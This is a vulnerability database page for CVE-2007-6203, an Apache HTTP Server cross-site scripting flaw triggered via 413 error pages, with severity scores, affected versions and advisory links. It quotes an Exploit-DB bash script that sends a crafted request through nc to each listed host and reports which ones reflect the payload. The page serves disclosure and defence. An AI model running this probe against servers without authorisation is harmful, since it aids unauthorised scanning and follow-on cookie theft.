CVE-2007-6203 : Detail

CVE-2007-6203

Cross-site Scripting
A03-Injection
76.25%V4
Network
2007-12-03
21h00 +00:00
2018-10-15
18h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Apache HTTP Server 2.0.x and 2.2.x does not sanitize the HTTP Method specifier header from an HTTP request when it is reflected back in a "413 Request Entity Too Large" error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated via an HTTP request containing an invalid Content-length value, a similar issue to CVE-2006-3918.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 30835

Publication date : 2007-11-29 23h00 +00:00
Author : Adrian Pastor
EDB Verified : Yes

source: https://www.securityfocus.com/bid/26663/info Apache is prone to a cross-site scripting weakness when handling HTTP request methods that result in 413 HTTP errors. An attacker may exploit this issue to steal cookie-based authentication credentials and launch other attacks. Apache 2.0.46 through 2.2.4 are vulnerable; other versions may also be affected. #!/bin/bash # PR07-37-scan if [ $# -ne 1 ] then echo "$0 <hosts-file>" exit fi for i in `cat $1` do if echo -en "<PROCHECKUP> / HTTP/1.1\nHost: $i\nConnection: close\nContent-length: 0\nContent-length: 0\n\n" | nc -w 4 $i 80 | grep -i '<PROCHECKUP>' > /dev/null then echo "$i is VULNERABLE!" fi done

Products Mentioned

Configuraton 0

Apache>>Http_server >> Version 2.0.46

Apache>>Http_server >> Version 2.0.47

Apache>>Http_server >> Version 2.0.48

Apache>>Http_server >> Version 2.0.49

Apache>>Http_server >> Version 2.0.50

Apache>>Http_server >> Version 2.0.51

Apache>>Http_server >> Version 2.0.52

Apache>>Http_server >> Version 2.0.53

Apache>>Http_server >> Version 2.0.54

Apache>>Http_server >> Version 2.0.55

Apache>>Http_server >> Version 2.0.57

Apache>>Http_server >> Version 2.0.58

Apache>>Http_server >> Version 2.0.59

Apache>>Http_server >> Version 2.1.1

Apache>>Http_server >> Version 2.1.2

Apache>>Http_server >> Version 2.1.3

Apache>>Http_server >> Version 2.1.4

Apache>>Http_server >> Version 2.1.5

Apache>>Http_server >> Version 2.1.6

Apache>>Http_server >> Version 2.1.7

Apache>>Http_server >> Version 2.1.8

Apache>>Http_server >> Version 2.2.0

Apache>>Http_server >> Version 2.2.2

Apache>>Http_server >> Version 2.2.3

Apache>>Http_server >> Version 2.2.4

References

http://www-1.ibm.com/support/docview.wss?uid=swg1PK57952
Tags : vendor-advisory, x_refsource_AIXAPAR
http://security.gentoo.org/glsa/glsa-200803-19.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://www.securityfocus.com/bid/26663
Tags : vdb-entry, x_refsource_BID
http://secunia.com/advisories/34219
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=bugtraq&m=125631037611762&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/27906
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=bugtraq&m=125631037611762&w=2
Tags : vendor-advisory, x_refsource_HP
http://securityreason.com/securityalert/3411
Tags : third-party-advisory, x_refsource_SREASON
http://www.vupen.com/english/advisories/2007/4301
Tags : vdb-entry, x_refsource_VUPEN
http://www.ubuntu.com/usn/USN-731-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://marc.info/?l=bugtraq&m=129190899612998&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/29420
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2007/4060
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/33105
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securitytracker.com/id?1019030
Tags : vdb-entry, x_refsource_SECTRACK
http://www-1.ibm.com/support/docview.wss?uid=swg24019245
Tags : vendor-advisory, x_refsource_AIXAPAR
http://secunia.com/advisories/29348
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/28196
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/30356
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=bugtraq&m=129190899612998&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/29640
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/30732
Tags : third-party-advisory, x_refsource_SECUNIA